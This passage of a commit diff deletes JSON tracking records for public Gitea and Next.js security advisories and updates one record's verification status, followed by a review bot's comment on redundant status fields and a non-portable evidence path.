更新: 421 个文件 - 2026-03-17 18:30:02

这个提交包含在:
hao
2026-03-17 18:30:02 -07:00
父节点 29c3faaa28
当前提交 a3edc88834
修改 421 个文件,包含 12474 行新增5845 行删除


@@ -1,80 +0,0 @@
{
"canonical_id": "gitea--CVE-2018-15192",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
"summary": "Gogs and Gitea SSRF Vulnerability in code.gitea.io/gitea",
"published_at": "2024-08-20T20:32:20Z",
"updated_at": "2026-03-03T04:54:04.686907Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-fg3x-rwq9-74cw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2018-15192",
"https://github.com/go-gitea/gitea/commit/599ff1c054e436daa4dc3f049aa8661d9c2395f9",
"https://github.com/go-gitea/gitea/issues/4624",
"https://github.com/go-gitea/gitea/pull/17482",
"https://github.com/gogs/gogs/commit/22717a1c064511cf37c46af5e650baf7184cf25b",
"https://github.com/gogs/gogs/issues/5366",
"https://github.com/gogs/gogs/pull/6002"
],
"aliases": [
"CVE-2018-15192",
"GHSA-fg3x-rwq9-74cw",
"GO-2023-1971"
],
"cve_ids": [
"CVE-2018-15192"
],
"ghsa_ids": [
"GHSA-fg3x-rwq9-74cw"
],
"osv_ids": [
"GO-2023-1971"
],
"affected_versions": [
"introduced=0, fixed<1.16.0-rc1",
"introduced=0, fixed<0.12.0"
],
"fixed_versions": [
"1.16.0-rc1",
"0.12.0"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-15192.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"ssrf-url-validation"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,74 +0,0 @@
{
"canonical_id": "gitea--CVE-2018-18926",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
"summary": "Gitea Remote Code Execution (RCE) in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:20.787387Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-hf6f-jq25-8gq9",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2018-18926",
"https://github.com/go-gitea/gitea/commit/aeb5655c25053bdcd7eee94ea37df88468374162",
"https://github.com/go-gitea/gitea/issues/5140",
"https://github.com/go-gitea/gitea/pull/5177"
],
"aliases": [
"CVE-2018-18926",
"GHSA-hf6f-jq25-8gq9",
"GO-2022-0844"
],
"cve_ids": [
"CVE-2018-18926"
],
"ghsa_ids": [
"GHSA-hf6f-jq25-8gq9"
],
"osv_ids": [
"GO-2022-0844"
],
"affected_versions": [
"introduced=0, fixed<1.5.2"
],
"fixed_versions": [
"1.5.2"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2018-18926.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,73 +0,0 @@
{
"canonical_id": "gitea--CVE-2019-1010261",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea XSS Vulnerability in code.gitea.io/gitea",
"summary": "Gitea XSS Vulnerability in code.gitea.io/gitea",
"published_at": "2024-08-20T20:31:38Z",
"updated_at": "2026-03-03T04:53:57.848904Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-5rh7-6gfj-mc87",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2019-1010261",
"https://github.com/go-gitea/gitea/pull/5905"
],
"aliases": [
"CVE-2019-1010261",
"GHSA-5rh7-6gfj-mc87",
"GO-2023-1922"
],
"cve_ids": [
"CVE-2019-1010261"
],
"ghsa_ids": [
"GHSA-5rh7-6gfj-mc87"
],
"osv_ids": [
"GO-2023-1922"
],
"affected_versions": [
"introduced=0, fixed<1.7.1"
],
"fixed_versions": [
"1.7.1"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2019-1010261.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,75 +0,0 @@
{
"canonical_id": "gitea--CVE-2020-13246",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Denial of Service in Gitea in code.gitea.io/gitea",
"summary": "Denial of Service in Gitea in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:17.939867Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-g2qx-6ghw-67hm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-13246",
"https://github.com/go-gitea/gitea/issues/10549",
"https://github.com/go-gitea/gitea/pull/11438",
"https://www.youtube.com/watch?v=DmVgADSVS88"
],
"aliases": [
"BIT-gitea-2020-13246",
"CVE-2020-13246",
"GHSA-g2qx-6ghw-67hm",
"GO-2022-0830"
],
"cve_ids": [
"CVE-2020-13246"
],
"ghsa_ids": [
"GHSA-g2qx-6ghw-67hm"
],
"osv_ids": [
"GO-2022-0830"
],
"affected_versions": [
"introduced=0, fixed<1.12.0"
],
"fixed_versions": [
"1.12.0"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2020-13246.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,77 +0,0 @@
{
"canonical_id": "gitea--CVE-2021-28378",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
"summary": "Cross-site Scripting in Gitea in code.gitea.io/gitea",
"published_at": "2024-08-21T15:29:04Z",
"updated_at": "2026-03-03T04:52:18.307544Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-g95p-88p4-76cm",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2021-28378",
"https://blog.gitea.io/2021/03/gitea-1.13.4-is-released",
"https://github.com/PandatiX/CVE-2021-28378",
"https://github.com/go-gitea/gitea/pull/14898",
"https://github.com/go-gitea/gitea/pull/14899"
],
"aliases": [
"BIT-gitea-2021-28378",
"CVE-2021-28378",
"GHSA-g95p-88p4-76cm",
"GO-2022-0832"
],
"cve_ids": [
"CVE-2021-28378"
],
"ghsa_ids": [
"GHSA-g95p-88p4-76cm"
],
"osv_ids": [
"GO-2022-0832"
],
"affected_versions": [
"introduced=0, fixed<1.13.4"
],
"fixed_versions": [
"1.13.4"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2021-28378.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"xss-output-encoding"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,74 +0,0 @@
{
"canonical_id": "gitea--CVE-2025-68939",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
"summary": "Gitea allows attackers to add attachments with forbidden file extensions in code.gitea.io/gitea",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:48.777563Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-263q-5cv3-xq9g",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68939",
"https://blog.gitea.com/release-of-1.23.0",
"https://github.com/go-gitea/gitea/pull/32151",
"https://github.com/go-gitea/gitea/releases/tag/v1.23.0"
],
"aliases": [
"BIT-gitea-2025-68939",
"CVE-2025-68939",
"GHSA-263q-5cv3-xq9g",
"GO-2025-4261"
],
"cve_ids": [
"CVE-2025-68939"
],
"ghsa_ids": [
"GHSA-263q-5cv3-xq9g"
],
"osv_ids": [
"GO-2025-4261"
],
"affected_versions": [
"introduced=0"
],
"fixed_versions": [],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68939.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "blocked-artifact",
"verification_mode": "real",
"last_verified_at": "2026-03-17T07:02:56+00:00",
"last_run_id": "gitea-livecheck-20260316",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/gitea-livecheck-20260316",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "file-upload-generic",
"artifact_mode": "official-image",
"blocked_reason": "unable to get image 'gitea/gitea:1.22.6': Cannot connect to the Docker daemon at unix:///Users/x/.docker/run/docker.sock. Is the docker daemon running?",
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,75 +0,0 @@
{
"canonical_id": "gitea--CVE-2025-68940",
"system_id": "gitea",
"display_name": "Gitea",
"category": "platforms",
"advisory_mode": "core",
"title": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
"summary": "Gitea doesn't adequately enforce branch deletion permissions after merging a pull request. in code.gitea.io/gitea",
"published_at": "2025-12-30T01:49:57Z",
"updated_at": "2026-03-03T04:57:50.087298Z",
"severity": "unknown",
"cvss_score": null,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/advisories/GHSA-rrcw-5rjv-vj26",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-68940",
"https://blog.gitea.com/release-of-1.22.5",
"https://github.com/go-gitea/gitea/pull/32654",
"https://github.com/go-gitea/gitea/releases/tag/v1.22.5"
],
"aliases": [
"BIT-gitea-2025-68940",
"CVE-2025-68940",
"GHSA-rrcw-5rjv-vj26",
"GO-2025-4267"
],
"cve_ids": [
"CVE-2025-68940"
],
"ghsa_ids": [
"GHSA-rrcw-5rjv-vj26"
],
"osv_ids": [
"GO-2025-4267"
],
"affected_versions": [
"introduced=0, fixed<1.22.5"
],
"fixed_versions": [
"1.22.5"
],
"package_name": "code.gitea.io/gitea",
"render_markdown": true,
"case_path": "07-framework-security/platforms/gitea/cases/gitea-cve-2025-68940.md",
"secure_code_topics": [
"authz-server-side-recheck",
"token-cookie-storage",
"proxy-trust-boundary"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Gitea"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,72 +0,0 @@
{
"canonical_id": "nextjs--CVE-2020-15242",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Open Redirect in Next.js versions",
"summary": "### Impact\n\n- **Affected**: Users of Next.js between 9.5.0 and 9.5.3 \n- **Not affected**: Deployments on Vercel ([https://vercel.com](https://vercel.com)) are not affected\n- **Not affected**: Deployments using `next export`\n\nWe recommend everyone to upgrade regardless of whether you can reproduce the issue or not.\n\n### Patches\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n### References\n\nhttps://github.com/vercel/next.js/releases/tag/v9.5.4\n\n",
"published_at": "2020-10-08T19:28:07Z",
"updated_at": "2026-03-13T22:14:13.665535Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-x56p-c8cg-q435",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2020-15242",
"https://github.com/vercel/next.js",
"https://github.com/zeit/next.js/releases/tag/v9.5.4"
],
"aliases": [
"CVE-2020-15242",
"GHSA-x56p-c8cg-q435"
],
"cve_ids": [
"CVE-2020-15242"
],
"ghsa_ids": [
"GHSA-x56p-c8cg-q435"
],
"osv_ids": [
"GHSA-x56p-c8cg-q435"
],
"affected_versions": [
"introduced=9.5.0, fixed<9.5.4"
],
"fixed_versions": [
"9.5.4"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2020-15242.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -49,18 +49,18 @@
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"verification_status": "verified-real",
"verification_mode": "real",
"last_verified_at": "2026-03-18T01:29:57+00:00",
"last_run_id": "nextjs-nextjs--CVE-2024-34351-20260318012953",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "ssrf-generic",
"artifact_mode": "synthetic",
"repro_profile_id": "nextjs-ssrf",
"artifact_mode": "local-fixture",
"blocked_reason": null,
"metadata": {
"source_names": [
@@ -70,5 +70,7 @@
"osv-batch"
],
"candidate_count": 1
}
},
"historical_status": "verified-real",
"latest_status": "verified-real"
}
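Review bot: The two keys added in the second hunk, `"historical_status": "verified-real"` and `"latest_status": "verified-real"`, repeat the value that the first hunk already writes into `verification_status`, so three fields now carry the same fact and nothing on the page prevents them from drifting apart on the next run. If the intent is to separate the outcome of the first real run from the most recent one, keep `verification_status` as the single source of truth and derive the other two, or document in the record's schema which field a consumer is expected to read. Separately, the new `evidence_bundle` value is an absolute path under a user home directory (`/Users/x/websafe/...`), which no other machine or CI job can resolve, so the `verified-real` claim cannot be checked from the repository; a repository-relative value such as `06-case-studies/generated-runs/nextjs-nextjs--CVE-2024-34351-20260318012953`, matching the relative style already used by `case_path`, would keep the evidence reachable. The enclosing JSON object begins before line 49 and lies outside both hunks.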


@@ -1,73 +0,0 @@
{
"canonical_id": "nextjs--CVE-2024-51479",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js authorization bypass vulnerability",
"summary": "### Impact\nIf a Next.js application is performing authorization in middleware based on pathname, it was possible for this authorization to be bypassed.\n\n### Patches\nThis issue was patched in Next.js `14.2.15` and later.\n\nIf your Next.js application is hosted on Vercel, this vulnerability has been automatically mitigated, regardless of Next.js version.\n\n### Workarounds\nThere are no official workarounds for this vulnerability.\n\n#### Credits\nWe'd like to thank [tyage](http://github.com/tyage) (GMO CyberSecurity by IERAE) for responsible disclosure of this issue.",
"published_at": "2024-12-17T15:09:06Z",
"updated_at": "2025-09-10T21:12:24Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-7gfc-8cq8-jh5f",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2024-51479",
"https://github.com/vercel/next.js/commit/1c8234eb20bc8afd396b89999a00f06b61d72d7b",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v14.2.15"
],
"aliases": [
"CVE-2024-51479",
"GHSA-7gfc-8cq8-jh5f"
],
"cve_ids": [
"CVE-2024-51479"
],
"ghsa_ids": [
"GHSA-7gfc-8cq8-jh5f"
],
"osv_ids": [
"GHSA-7gfc-8cq8-jh5f"
],
"affected_versions": [
"introduced=9.5.5, fixed<14.2.15"
],
"fixed_versions": [
"14.2.15"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2024-51479.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,85 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-29927",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Authorization Bypass in Next.js Middleware",
"summary": "# Impact\nIt is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware.\n\n# Patches\n* For Next.js 15.x, this issue is fixed in `15.2.3`\n* For Next.js 14.x, this issue is fixed in `14.2.25`\n* For Next.js 13.x, this issue is fixed in 13.5.9\n* For Next.js 12.x, this issue is fixed in 12.3.5\n* For Next.js 11.x, consult the below workaround.\n\n_Note: Next.js deployments hosted on Vercel are automatically protected against this vulnerability._\n\n# Workaround\nIf patching to a safe version is infeasible, we recommend that you prevent external user requests which contain the `x-middleware-subrequest` header from reaching your Next.js application.\n\n## Credits\n\n- Allam Rachid (zhero;)\n- Allam Yasser (inzo_)",
"published_at": "2025-03-21T15:20:12Z",
"updated_at": "2026-03-04T15:06:29.993197Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-f82v-jwr5-mffw",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-29927",
"https://github.com/vercel/next.js/commit/52a078da3884efe6501613c7834a3d02a91676d2",
"https://github.com/vercel/next.js/commit/5fd3ae8f8542677c6294f32d18022731eab6fe48",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v12.3.5",
"https://github.com/vercel/next.js/releases/tag/v13.5.9",
"https://security.netapp.com/advisory/ntap-20250328-0002",
"https://vercel.com/changelog/vercel-firewall-proactively-protects-against-vulnerability-with-middleware",
"http://www.openwall.com/lists/oss-security/2025/03/23/3",
"http://www.openwall.com/lists/oss-security/2025/03/23/4"
],
"aliases": [
"CVE-2025-29927",
"GHSA-f82v-jwr5-mffw"
],
"cve_ids": [
"CVE-2025-29927"
],
"ghsa_ids": [
"GHSA-f82v-jwr5-mffw"
],
"osv_ids": [
"GHSA-f82v-jwr5-mffw"
],
"affected_versions": [
"introduced=13.0.0, fixed<13.5.9",
"introduced=14.0.0, fixed<14.2.25",
"introduced=15.0.0, fixed<15.2.3",
"introduced=12.0.0, fixed<12.3.5"
],
"fixed_versions": [
"13.5.9",
"14.2.25",
"15.2.3",
"12.3.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-29927.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "real",
"last_verified_at": "2026-03-17T06:30:47+00:00",
"last_run_id": "nextjs-nextjs--CVE-2025-29927-20260317063047",
"evidence_bundle": "/Users/x/websafe/06-case-studies/generated-runs/nextjs-nextjs--CVE-2025-29927-20260317063047",
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "authz-bypass-generic",
"artifact_mode": "official-source",
"blocked_reason": "dry-run only",
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,75 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-49826",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.JS vulnerability can lead to DoS via cache poisoning ",
"summary": "### Summary\nA vulnerability affecting Next.js has been addressed. It impacted versions 15.0.4 through 15.1.8 and involved a cache poisoning bug leading to a Denial of Service (DoS) condition.\n\nUnder certain conditions, this issue may allow a HTTP 204 response to be cached for static pages, leading to the 204 response being served to all users attempting to access the page\n\nMore details: [CVE-2025-49826](https://vercel.com/changelog/cve-2025-49826)\n\n## Credits\n- Allam Rachid [zhero;](https://zhero-web-sec.github.io/research-and-things/)\n- Allam Yasser (inzo)",
"published_at": "2025-07-03T21:14:48Z",
"updated_at": "2025-07-03T21:49:52Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-67rr-84xm-4c7r",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-49826",
"https://github.com/vercel/next.js/commit/16bfce64ef2157f2c1dfedcfdb7771bc63103fd2",
"https://github.com/vercel/next.js/commit/a15b974ed707d63ad4da5b74c1441f5b7b120e93",
"https://github.com/vercel/next.js",
"https://github.com/vercel/next.js/releases/tag/v15.1.8",
"https://vercel.com/changelog/cve-2025-49826"
],
"aliases": [
"CVE-2025-49826",
"GHSA-67rr-84xm-4c7r"
],
"cve_ids": [
"CVE-2025-49826"
],
"ghsa_ids": [
"GHSA-67rr-84xm-4c7r"
],
"osv_ids": [
"GHSA-67rr-84xm-4c7r"
],
"affected_versions": [
"introduced=15.0.4-canary.51, fixed<15.1.8"
],
"fixed_versions": [
"15.1.8"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-49826.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-55173",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Content Injection Vulnerability for Image Optimization",
"summary": "A vulnerability in **Next.js Image Optimization** has been fixed in **v15.4.5** and **v14.2.31**. The issue allowed attacker-controlled external image sources to trigger file downloads with arbitrary content and filenames under specific configurations. This behavior could be abused for phishing or malicious file delivery.\n\nAll users relying on `images.domains` or `images.remotePatterns` are encouraged to upgrade and verify that external image sources are strictly validated.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-55173)",
"published_at": "2025-08-29T21:59:55Z",
"updated_at": "2026-02-04T04:35:34.538107Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-xv57-4mr9-wg8v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-55173",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-55173",
"http://vercel.com/changelog/cve-2025-55173"
],
"aliases": [
"CVE-2025-55173",
"GHSA-xv57-4mr9-wg8v"
],
"cve_ids": [
"CVE-2025-55173"
],
"ghsa_ids": [
"GHSA-xv57-4mr9-wg8v"
],
"osv_ids": [
"GHSA-xv57-4mr9-wg8v"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.31",
"introduced=15.0.0, fixed<15.4.5"
],
"fixed_versions": [
"14.2.31",
"15.4.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-55173.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "xss-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
"source_names": [
"OSV Next.js"
],
"source_kinds": [
"osv-batch"
],
"candidate_count": 1
}
}


@@ -1,76 +0,0 @@
{
"canonical_id": "nextjs--CVE-2025-57752",
"system_id": "nextjs",
"display_name": "Next.js",
"category": "frameworks",
"advisory_mode": "core",
"title": "Next.js Affected by Cache Key Confusion for Image Optimization API Routes",
"summary": "A vulnerability in Next.js Image Optimization has been fixed in v15.4.5 and v14.2.31. When images returned from API routes vary based on request headers (such as `Cookie` or `Authorization`), these responses could be incorrectly cached and served to unauthorized users due to a cache key confusion bug.\n\nAll users are encouraged to upgrade if they use API routes to serve images that depend on request headers and have image optimization enabled.\n\nMore details at [Vercel Changelog](https://vercel.com/changelog/cve-2025-57752)",
"published_at": "2025-08-29T22:06:22Z",
"updated_at": "2026-02-04T02:50:08.291668Z",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"source_confidence": "official",
"official_source_url": "https://github.com/vercel/next.js/security/advisories/GHSA-g5qg-72qw-gw5v",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-57752",
"https://github.com/vercel/next.js/pull/82114",
"https://github.com/vercel/next.js/commit/6b12c60c61ee80cb0443ccd20de82ca9b4422ddd",
"https://github.com/vercel/next.js",
"https://vercel.com/changelog/cve-2025-57752"
],
"aliases": [
"CVE-2025-57752",
"GHSA-g5qg-72qw-gw5v"
],
"cve_ids": [
"CVE-2025-57752"
],
"ghsa_ids": [
"GHSA-g5qg-72qw-gw5v"
],
"osv_ids": [
"GHSA-g5qg-72qw-gw5v"
],
"affected_versions": [
"introduced=0.9.9, fixed<14.2.31",
"introduced=15.0.0, fixed<15.4.5"
],
"fixed_versions": [
"14.2.31",
"15.4.5"
],
"package_name": "next",
"render_markdown": true,
"case_path": "07-framework-security/frameworks/nextjs/cases/nextjs-cve-2025-57752.md",
"secure_code_topics": [
"authz-server-side-recheck",
"proxy-trust-boundary",
"token-cookie-storage"
],
"status": "generated",
"triage_reasons": [],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"last_verified_at": null,
"last_run_id": null,
"evidence_bundle": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
},
"repro_profile_id": "proxy-boundary-generic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"metadata": {
